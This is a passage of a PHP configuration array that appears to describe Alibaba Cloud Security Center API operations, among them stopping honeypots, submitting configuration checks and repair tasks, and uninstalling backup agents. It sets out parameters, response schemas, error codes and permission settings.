'arn' => '*'], ], ], ], ], ], 'StopHoneypot' => [ 'summary' => 'Stops a honeypot.', 'methods' => ['post', 'get'], 'schemes' => ['https', 'http'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => ['operationType' => 'update'], 'parameters' => [ [ 'name' => 'HoneypotId', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The honeypot ID.'."\n" ."\n" .'> You can call the [ListHoneypot](~~ListHoneypot~~) operation to obtain IDs of honeypots.'."\n", 'type' => 'string', 'required' => true, 'example' => '444c699ac151b183b04b562b1dc02639d504c9d097246a322de75c963fe*****'], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'HoneypotId' => ['title' => '', 'description' => 'The ID of the honeypot.'."\n", 'type' => 'string', 'example' => '9bf8cd373112263d4bc102fc5dba9d9f812ee05d4d35c487d330d52e937f****'], 'HoneypotName' => ['title' => '', 'description' => 'The name of the honeypot.'."\n", 'type' => 'string', 'example' => 'hyl-phpmya****'], 'ControlNodeName' => ['title' => '', 'description' => 'The name of the management node to which the honeypot belongs.'."\n", 'type' => 'string', 'example' => 'managerNoden****'], 'HoneypotImageName' => ['title' => '', 'description' => 'The name of the image that is used for the honeypot.'."\n", 'type' => 'string', 'example' => 'metabase'], 'PresetId' => ['title' => '', 'description' => 'The ID of the honeypot custom parameter.'."\n", 'type' => 'string', 'example' => '868a7579-00b5-4a74-999d-8bd3f411****'], 'State' => [ 'title' => '', 'description' => 'The statuses of the honeypots.'."\n", 'type' => 'array', 'items' => ['description' => 'The status of the honeypot.'."\n", 'type' => 'string', 'example' => 'running', 'title' => ''], 'example' => '', ], 'HoneypotImageDisplayName' => ['title' => '', 'description' => 'The display name of the image.'."\n", 'type' => 'string', 'example' => 'RuoYi'], 'NodeId' => ['title' => '', 'description' => 'The ID of the management node.'."\n", 'type' => 'string', 'example' => 'a882e590-b87b-45a6-87b9-d0a3e5a0****'], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The response code. The status code **200** indicates that the request was successful. Other status codes indicate that the request failed. You can identify the cause of the failure based on the status code.'."\n", 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The returned message.'."\n", 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'D65AADFC-1D20-5A6A-8F6A-9FA53C*****', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"HoneypotId\\": \\"9bf8cd373112263d4bc102fc5dba9d9f812ee05d4d35c487d330d52e937f****\\",\\n \\"HoneypotName\\": \\"hyl-phpmya****\\",\\n \\"ControlNodeName\\": \\"managerNoden****\\",\\n \\"HoneypotImageName\\": \\"metabase\\",\\n \\"PresetId\\": \\"868a7579-00b5-4a74-999d-8bd3f411****\\",\\n \\"State\\": [\\n \\"running\\"\\n ],\\n \\"HoneypotImageDisplayName\\": \\"RuoYi\\",\\n \\"NodeId\\": \\"a882e590-b87b-45a6-87b9-d0a3e5a0****\\"\\n },\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"D65AADFC-1D20-5A6A-8F6A-9FA53C*****\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', 'title' => 'StopHoneypot', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:StopHoneypot', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'SubmitCheck' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'none', 'riskType' => 'none', 'chargeType' => 'paid', 'abilityTreeCode' => '119327', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'ScanRange', 'in' => 'query', 'schema' => ['description' => 'The scan range. Valid values:'."\n" .'- **FULL**: scans all check items'."\n" .'- **POLICY**: scans custom-configured check items', 'type' => 'string', 'required' => false, 'example' => 'POLICY', 'title' => ''], ], [ 'name' => 'TaskSource', 'in' => 'query', 'schema' => ['description' => 'The task source. Valid values:'."\n" ."\n" .'- **YAO_CHI**: Alibaba Cloud ApsaraDB console.', 'type' => 'string', 'required' => false, 'example' => 'YAO_CHI', 'title' => ''], ], [ 'name' => 'ResourceDirectoryAccountId', 'in' => 'query', 'schema' => ['type' => 'integer', 'format' => 'int64', 'description' => '', 'title' => '', 'example' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'TaskId' => ['description' => 'The ID of the task that runs the cloud service configuration check.', 'type' => 'string', 'example' => '5fe3f65d-4012-455d-8232-2a98a858****', 'title' => ''], 'Data' => [ 'description' => 'The data returned when the API call is successful.', 'type' => 'object', 'properties' => [ 'OperateCode' => ['description' => 'The operation code of the cloud service configuration check task.'."\n" ."\n" .'- **Throttling**: rate limited'."\n" .'- **AuthorizationExhaust**: insufficient authorization quota', 'type' => 'string', 'example' => 'Throttling', 'title' => ''], 'ThrottlingTimeSecond' => ['description' => 'The rate limit duration. Unit: seconds.', 'type' => 'integer', 'format' => 'int32', 'example' => '1800', 'title' => ''], ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique ID for each API request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'CE8369A6-A843-5E1B-A613-78E6920D****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ['errorCode' => 'NoPurchase', 'errorMessage' => 'The user did not purchase this product.', 'description' => ''], ['errorCode' => 'RdCheckNoPermission', 'errorMessage' => 'Resource directory account verification has no permission.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ['errorCode' => 'RdCheckInnerError', 'errorMessage' => 'Resource directory account service internal error.', 'description' => ''], ], ], 'gatewayOptions' => [ 'gatewayProtocols' => [], ], 'title' => 'Submit a cloud service configuration check', 'summary' => 'Submits a cloud service configuration check.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'SubmitCheck'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:SubmitCheck', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"TaskId\\": \\"5fe3f65d-4012-455d-8232-2a98a858****\\",\\n \\"Data\\": {\\n \\"OperateCode\\": \\"Throttling\\",\\n \\"ThrottlingTimeSecond\\": 1800\\n },\\n \\"RequestId\\": \\"CE8369A6-A843-5E1B-A613-78E6920D****\\"\\n}","type":"json"}]', ], 'SubmitOperationTask' => [ 'summary' => 'Submits a repair task of risk items detected in configuration assessment or rolls back a repair task that is executed.', 'methods' => ['post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '213382', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], ], 'parameters' => [ [ 'name' => 'CheckId', 'in' => 'query', 'schema' => ['description' => 'The ID of the check item.'."\n" ."\n" .'> You can call the [ListCheckResult](~~ListCheckResult~~) operation to obtain the ID of the check item.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '132', 'title' => ''], ], [ 'name' => 'OperationTaskInstances', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The asset information required to submit the tasks for instances.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The structure of the asset information.'."\n", 'type' => 'object', 'properties' => [ 'Vendor' => ['description' => 'The service provider of the asset. Valid values:'."\n" ."\n" .'* **0**: an asset provided by Alibaba Cloud.'."\n" .'* **1**: an asset outside Alibaba Cloud.'."\n" .'* **2**: an asset in a data center.'."\n" .'* **3**, **4**, **5**, and **7**: an asset from a third-party cloud service provider.'."\n" .'* **8**: a lightweight asset.'."\n", 'type' => 'string', 'required' => false, 'example' => '7', 'title' => ''], 'RegionId' => ['description' => 'The region ID of the server.'."\n", 'type' => 'string', 'required' => false, 'example' => 'cn-hangzhou', 'title' => ''], 'InstanceId' => ['description' => 'The instance ID of the server.'."\n", 'type' => 'string', 'required' => false, 'example' => 'i-uf6533m4vuo3oa33****', 'title' => ''], 'TaskId' => ['description' => 'The ID of the task that you want to roll back'."\n", 'type' => 'string', 'required' => false, 'example' => '7d0b10e35e80c9e5ebac5f1054****', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'DimensionType', 'in' => 'query', 'schema' => [ 'description' => 'The dimension of the task that you want to submit. Valid values:'."\n" ."\n" .'* Instance dimension: INSTANCE'."\n" .'* Check item dimension: CHECK_ID'."\n", 'type' => 'string', 'required' => false, 'example' => 'CHECK_ID', 'enum' => ['INSTANCE', 'CHECK_ID', 'INSTANCE_RELATION_KEY'], 'title' => '', ], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The type of the task that you want to submit. Valid values:'."\n" ."\n" .'* Repair task: REPAIR'."\n" .'* Rollback task: ROLLBACK'."\n", 'type' => 'string', 'required' => true, 'example' => 'REPAIR', 'title' => ''], ], [ 'name' => 'RepairTempParam', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The temporary parameters required for the repair task.'."\n", 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Name' => ['description' => 'The name of the temporary repair parameter.'."\n", 'type' => 'string', 'required' => false, 'example' => 'IPPort', 'title' => ''], 'Value' => ['description' => 'The value of the temporary repair parameter.'."\n", 'type' => 'string', 'required' => false, 'example' => '192.168.1XX.1XX', 'title' => ''], ], 'required' => false, 'description' => '', 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'RelationKey', 'in' => 'query', 'schema' => ['description' => 'The key linked to cross-page selections during task submission.'."\n" ."\n" .'> You can call the [CreateAssetSelectionConfig](~~CreateAssetSelectionConfig~~) operation to query the associated key from the BusinessType field.'."\n", 'type' => 'string', 'required' => false, 'example' => 'CSPM_OPERATION_RELATION_KEY_173***', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The ID of the request, which is used to locate and troubleshoot issues.', 'type' => 'string', 'example' => '0C8487EF-50C2-54BB-8634-10F8C35D****'], 'OperateCode' => ['description' => 'The handling result code. Valid values:'."\n" ."\n" .'* Insufficient authorization: AuthorizationExhaust'."\n" .'* Unauthorized: ActionTrialUnauthorized'."\n", 'type' => 'string', 'example' => 'AuthorizationExhaust', 'title' => ''], 'RootTaskId' => ['description' => 'The main task ID that is returned when the task is submitted.'."\n", 'type' => 'string', 'example' => '89f5d7813bd59dd237580a8664b3xxxx', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'RepairTaskConflict', 'errorMessage' => 'Fix task conflicts.', 'description' => ''], ['errorCode' => 'RepairedParamNotCustomized.%s', 'errorMessage' => 'The required repair parameter %s is not customized.', 'description' => ''], ['errorCode' => 'ErrorParamFormat.%s', 'errorMessage' => 'Parameter %s format is incorrectly filled in.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"0C8487EF-50C2-54BB-8634-10F8C35D****\\",\\n \\"OperateCode\\": \\"AuthorizationExhaust\\",\\n \\"RootTaskId\\": \\"89f5d7813bd59dd237580a8664b3xxxx\\"\\n}","type":"json"}]', 'title' => 'SubmitOperationTask', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'SubmitOperationTask'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:OperateCheck', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'SubmitTenantCheck' => [ 'summary' => 'Submits a free quick scan task, which includes vulnerability detection in the free category and free check items of Cloud Security Posture Management (CSPM).', 'methods' => ['post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '236185', 'abilityTreeNodes' => ['FEATUREsasU76LC1', 'FEATUREsas8WIQPJ'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'Schema of Response'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '1162D670-E633-5676-AE87-8359B066****'], 'Data' => [ 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'TaskId' => ['description' => 'The ID of the scan task.'."\n", 'type' => 'string', 'example' => 'fc98d58eb56f699d49bf7ebbd6d7****', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"1162D670-E633-5676-AE87-8359B066****\\",\\n \\"Data\\": {\\n \\"TaskId\\": \\"fc98d58eb56f699d49bf7ebbd6d7****\\"\\n }\\n}","type":"json"}]', 'title' => 'SubmitTenantCheck', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'SubmitTenantCheck'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:SubmitTenantCheck', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'TriggerCheck' => [ 'summary' => 'Triggers ISO 27001 compliance checks of Security Center.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '215968', 'abilityTreeNodes' => ['FEATUREsas312EAH'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'Schema of Response'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '43313389-DED8-5BB7-8CB9-F22CDEB744DE'], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"43313389-DED8-5BB7-8CB9-F22CDEB744DE\\"\\n}","type":"json"}]', 'title' => 'TriggerCheck', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'TriggerCheck'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:TriggerCheck', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'UnBindHybridProxy' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '169980', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'ClusterName', 'in' => 'query', 'schema' => ['description' => 'The name of the proxy cluster.'."\n", 'type' => 'string', 'required' => true, 'example' => 'proxy-test', 'title' => ''], ], [ 'name' => 'YundunUuids', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The UUIDs of the servers that you want to remove from the proxy cluster.'."\n", 'type' => 'array', 'items' => ['description' => 'The UUID of the server that you want to remove from the proxy cluster.'."\n", 'type' => 'string', 'required' => false, 'example' => 'fe914136-47ff-4dc3-bd25-fdd24969****', 'title' => ''], 'required' => true, 'maxItems' => 10000, 'minItems' => 1, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '3956048F-9D73-5EDB-834B-4827BB483977'], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'UnBindHybridProxy', 'summary' => 'Removes servers from a proxy cluster.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UnBindHybridProxy'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:UnBindHybridProxy', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"3956048F-9D73-5EDB-834B-4827BB483977\\"\\n}","type":"json"}]', ], 'UnMarkMonitorAccounts' => [ 'summary' => 'Cancel marking for members. Remove followed members from the list. In the Security Center console, the drop-down list above the left-side navigation pane no longer displays the members.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => ['operationType' => 'update'], 'parameters' => [ [ 'name' => 'AccountIds', 'in' => 'query', 'schema' => ['description' => 'The IDs of the members.', 'type' => 'string', 'required' => true, 'example' => '125267953644XXXX,125807832682XXXX', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => '3B7EF1A4-E970-5A7F-91CA-416F9881333E', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"3B7EF1A4-E970-5A7F-91CA-416F9881333E\\"\\n}","type":"json"}]', 'title' => 'UnMarkMonitorAccounts', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UnMarkMonitorAccounts'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:UnMarkMonitorAccounts', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'UnbindAegis' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => ['operationType' => 'none'], 'parameters' => [ [ 'name' => 'Uuids', 'in' => 'query', 'schema' => ['description' => 'The UUIDs of the non-Alibaba Cloud servers that you want to unbind. Separate multiple UUIDs with commas (,).'."\n" .'> You can call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to obtain this parameter.', 'type' => 'string', 'required' => true, 'example' => '4fe8e1cd-3c37-4851-b9de-124da32c****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique identifier for each API request. You can use the request ID to troubleshoot issues.', 'type' => 'string', 'example' => '825F5526-2A17-4279-857F-F790E9590171', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'InnerError', 'errorMessage' => 'InnerError', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Unbind non-Alibaba Cloud servers from security center', 'summary' => 'Unbinds non-Alibaba Cloud servers from Security Center.', 'description' => 'If you no longer need Security Center to protect your non-Alibaba Cloud servers, you can call the UnbindAegis operation to unbind the servers. After a non-Alibaba Cloud server is unbound, the server no longer consumes your Security Center quota (the number of servers or compute cores). The released quota can then be used to protect other servers.'."\n" .'> Only non-Alibaba Cloud servers require the unbinding operation. Alibaba Cloud ECS instances do not require unbinding. For ECS instances, even if you uninstall the agent, the server still appears in the asset management list in an offline state and is not removed from the list. '."\n" ."\n" .'**Before you begin**'."\n" .'- The agent on the non-Alibaba Cloud server that you want to unbind has been paused (the client status is disabled). You can call the [PauseClient](~~PauseClient~~) operation to pause the agent.'."\n" .'- Client self-protection has been disabled on the non-Alibaba Cloud server that you want to unbind. For more information, see [Client self-protection](~~460802~~).', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UnbindAegis'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:UnbindAegis', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"825F5526-2A17-4279-857F-F790E9590171\\"\\n}","type":"json"}]', ], 'UninstallBackupClient' => [ 'summary' => 'Uninstalls the anti-ransomware agent.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => ['operationType' => 'none'], 'parameters' => [ [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server from which you want to uninstall the anti-ransomware agent.'."\n" ."\n" .'> You must specify at least one of the UuidList and Uuid parameters.'."\n", 'type' => 'string', 'required' => false, 'example' => 'D0D6E6E4-CB8C-4897-B852-46AEFDA0****', 'title' => ''], ], [ 'name' => 'PolicyVersion', 'in' => 'query', 'schema' => ['description' => 'The version of the anti-ransomware policy. You can call the [DescribeBackupPolicies](~~DescribeBackupPolicies~~) operation to query the versions of anti-ransomware policies. Valid values:'."\n" ."\n" .'* **1.0.0**'."\n" .'* **2.0.0**'."\n", 'type' => 'string', 'required' => true, 'example' => '2.0.0', 'title' => ''], ], [ 'name' => 'UuidList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The UUIDs of the servers from which you want to uninstall the anti-ransomware agent.'."\n" ."\n" .'> You must specify at least one of the UuidList and Uuid parameters.'."\n", 'type' => 'array', 'items' => ['description' => 'The UUID of the server from which you want to uninstall the anti-ransomware agent.'."\n" ."\n" .'> You must specify at least one of the UuidList and Uuid parameters.'."\n", 'type' => 'string', 'required' => false, 'example' => 'D0D6E6E4-CB8C-4897-B852-46AEFDA0****', 'title' => ''], 'required' => false, 'example' => '["D0D6E6E4-CB8C-4897-B852-46AEFDA0****", "3bb30859-b3b5-4f28-868f-b0892c98****"]', 'maxItems' => 100, 'title' => '', ], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '8eec3b63-18af-454b-8c17-aabcf7190b70', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'HbrClientNotInstalled', 'errorMessage' => 'client is not Installed. refresh you page', 'description' => ''], ['errorCode' => 'HbrClientUninstalling', 'errorMessage' => 'During client uninstallation, you can refresh the page to view the uninstallation result.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'responseDemo' => '[{"type":"json","example":"{\\n \\"RequestId\\": \\"8eec3b63-18af-454b-8c17-aabcf7190b70\\"\\n}","errorExample":""},{"type":"xml","example":"\\n \\"8eec3b63-18af-454b-8c17-aabcf7190b70\\",\\"fb711b59-d49c-4da7-a36f-9a56fb705fbe\\"\\n","errorExample":""}]', 'title' => 'UninstallBackupClient', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UninstallBackupClient'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:UninstallBackupClient', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'UninstallUniBackupAgent' => [ 'summary' => 'Uninstalls the database backup agent.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => ['operationType' => 'none'], 'parameters' => [ [ 'name' => 'PolicyId', 'in' => 'query', 'schema' => ['description' => 'The ID of the anti-ransomware policy.'."\n" ."\n" .'> You can call the [DescribeUniBackupPolicies](~~DescribeUniBackupPolicies~~) operation to query the IDs of anti-ransomware policies.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '123', 'title' => ''], ], ], 'responses' => [ 200 